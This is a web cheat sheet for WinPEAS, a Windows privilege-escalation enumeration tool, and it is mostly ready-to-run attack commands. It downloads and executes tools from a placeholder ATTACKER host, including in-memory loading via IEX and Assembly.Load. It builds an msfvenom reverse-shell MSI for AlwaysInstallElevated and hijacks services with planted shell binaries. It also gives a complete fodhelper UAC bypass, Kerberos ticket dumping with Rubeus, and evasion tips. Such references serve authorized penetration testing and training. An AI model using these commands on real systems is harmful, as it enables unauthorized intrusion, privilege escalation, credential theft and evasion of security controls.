โ† All cheat sheets

WINPEAS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

WinPEAS is a script for Windows privilege escalation enumeration.
Part of the PEASS-ng suite for finding misconfigurations.

DOWNLOAD#

# From GitHub releases
# winPEASx64.exe (64-bit)
# winPEASx86.exe (32-bit)
# winPEAS.bat (batch version)
# winPEAS.ps1 (PowerShell version)

https://github.com/carlospolop/PEASS-ng/releases

TRANSFER TO TARGET#


    

CERTUTIL#

certutil -urlcache -f http://ATTACKER/winPEASx64.exe winpeas.exe

POWERSHELL#

IWR -Uri http://ATTACKER/winPEASx64.exe -OutFile winpeas.exe
(New-Object Net.WebClient).DownloadFile('http://ATTACKER/winPEASx64.exe','C:\Temp\winpeas.exe')

SMB SHARE#

copy \\ATTACKER\share\winPEASx64.exe C:\Temp\winpeas.exe

BASIC USAGE#

# Run all checks
.\winpeas.exe

# Quiet mode
.\winpeas.exe quiet

# Specific checks
.\winpeas.exe systeminfo
.\winpeas.exe userinfo
.\winpeas.exe processinfo
.\winpeas.exe servicesinfo
.\winpeas.exe applicationsinfo
.\winpeas.exe networkinfo
.\winpeas.exe windowscreds
.\winpeas.exe browserinfo
.\winpeas.exe filesinfo

# Output to file
.\winpeas.exe > output.txt
.\winpeas.exe log=output.txt

OPTIONS#

# Search types
searchall       Search for all things
searchfast      Skip some time-consuming checks
cmd             Search only in command line
notcolor        Don't use colors
wait            Wait before exit
debug           Debug mode
log=FILE        Log output to file

CHECK CATEGORIES#


    

SYSTEM INFORMATION#

.\winpeas.exe systeminfo

# Checks:
# - OS version and patches
# - Environment variables
# - Audit settings
# - WEF settings
# - LAPS
# - Credential Guard
# - Cached credentials
# - UAC settings
# - AV/EDR detection
# - PowerShell settings

USER INFORMATION#

.\winpeas.exe userinfo

# Checks:
# - Current user info
# - User privileges
# - All users
# - Groups
# - Logged on users
# - Password policy
# - Clipboard contents
# - Saved RDP connections

PROCESS INFORMATION#

.\winpeas.exe processinfo

# Checks:
# - Running processes
# - Process permissions
# - DLL hijacking opportunities
# - Command lines
# - Process tokens

SERVICES INFORMATION#

.\winpeas.exe servicesinfo

# Checks:
# - Non-standard services
# - Modifiable services
# - Unquoted service paths
# - Service DLL hijacking
# - Service permissions

APPLICATIONS INFO#

.\winpeas.exe applicationsinfo

# Checks:
# - Installed applications
# - AutoRun applications
# - Scheduled tasks
# - Startup apps
# - Device drivers

NETWORK INFORMATION#

.\winpeas.exe networkinfo

# Checks:
# - Network interfaces
# - DNS cache
# - Listening ports
# - Firewall rules
# - Network shares
# - WiFi profiles

WINDOWS CREDENTIALS#

.\winpeas.exe windowscreds

# Checks:
# - Credential Manager
# - DPAPI credentials
# - Remote Desktop credentials
# - Kerberos tickets
# - WiFi passwords
# - AppCmd credentials
# - SCClient credentials
# - Putty credentials
# - SSH keys
# - Cloud credentials

BROWSER INFORMATION#

.\winpeas.exe browserinfo

# Checks:
# - Chrome credentials/history
# - Firefox credentials/history
# - IE/Edge credentials
# - Browser extensions

FILES INFORMATION#

.\winpeas.exe filesinfo

# Checks:
# - Interesting files
# - Backup files
# - Config files
# - Log files
# - Office recent files
# - Password files
# - Registry passwords

COMMON FINDINGS#


    

UNQUOTED SERVICE PATH#

# Vulnerable service path:
# C:\Program Files\Some App\service.exe

# Place malicious binary:
# C:\Program.exe
# C:\Program Files\Some.exe

# Restart service
sc stop "ServiceName"
sc start "ServiceName"

SERVICE BINARY PERMISSIONS#

# Check service binary permissions
icacls "C:\path\to\service.exe"

# If writable, replace with malicious binary
copy C:\Temp\shell.exe "C:\path\to\service.exe"
sc stop "ServiceName"
sc start "ServiceName"

SERVICE CONFIGURATION#

# Modifiable service
# Change binary path
sc config "ServiceName" binpath="C:\Temp\shell.exe"
sc stop "ServiceName"
sc start "ServiceName"

DLL HIJACKING#

# Missing DLL in service
# Place malicious DLL in:
# - Application directory
# - C:\Windows\System32 (if writable)
# - PATH directories

ALWAYS INSTALL ELEVATED#

# Check registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If enabled, create MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

SCHEDULED TASKS#

# Writable scheduled task script
echo "C:\Temp\shell.exe" > "C:\path\to\task.bat"

# Or overwrite task binary

AUTOLOGON CREDENTIALS#

# Check for autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# DefaultUserName
# DefaultPassword

STORED CREDENTIALS#

# Credential Manager
cmdkey /list
runas /savecred /user:admin cmd

# DPAPI
# WinPEAS extracts master keys

TOKEN PRIVILEGES#

# Abusable privileges:
# - SeImpersonatePrivilege -> Potato attacks
# - SeAssignPrimaryTokenPrivilege -> Token impersonation
# - SeBackupPrivilege -> Read any file
# - SeRestorePrivilege -> Write any file
# - SeTakeOwnershipPrivilege -> Own any file
# - SeDebugPrivilege -> Debug processes
# - SeLoadDriverPrivilege -> Load drivers

UAC BYPASS#

# Check UAC settings
# If not maximum, bypass possible

# Fodhelper bypass
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start C:\Temp\shell.exe" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"

KERBEROS TICKETS#

# WinPEAS lists tickets
# Use Rubeus for abuse
Rubeus.exe triage
Rubeus.exe dump

POWERSHELL VERSION#

# Load script
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/winPEAS.ps1')

# Run
Invoke-WinPEAS

# Specific checks
Invoke-WinPEAS -Command systeminfo

BATCH VERSION#

# When exe blocked
.\winPEAS.bat

# Less comprehensive but evades some controls

EVASION#

# Obfuscate executable name
copy winpeas.exe update.exe

# Run from memory (PowerShell)
$data = (New-Object Net.WebClient).DownloadData('http://ATTACKER/winPEAS.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[winPEAS.Program]::Main("")

# Use batch version
# Use PowerShell version with AMSI bypass

INTEGRATION#

# With Metasploit
upload winpeas.exe C:\\Temp\\winpeas.exe
shell
C:\Temp\winpeas.exe

# With Evil-WinRM
upload /local/winpeas.exe C:\Temp\winpeas.exe
C:\Temp\winpeas.exe

# With CrackMapExec
nxc smb TARGET -u user -p pass -x "C:\Temp\winpeas.exe"

QUICK REFERENCE#

.\winpeas.exe                    # Run all checks
.\winpeas.exe quiet              # Minimal output
.\winpeas.exe systeminfo         # System info only
.\winpeas.exe servicesinfo       # Services only
.\winpeas.exe windowscreds       # Credentials only
.\winpeas.exe log=out.txt        # Save to file
.\winpeas.exe searchfast         # Quick scan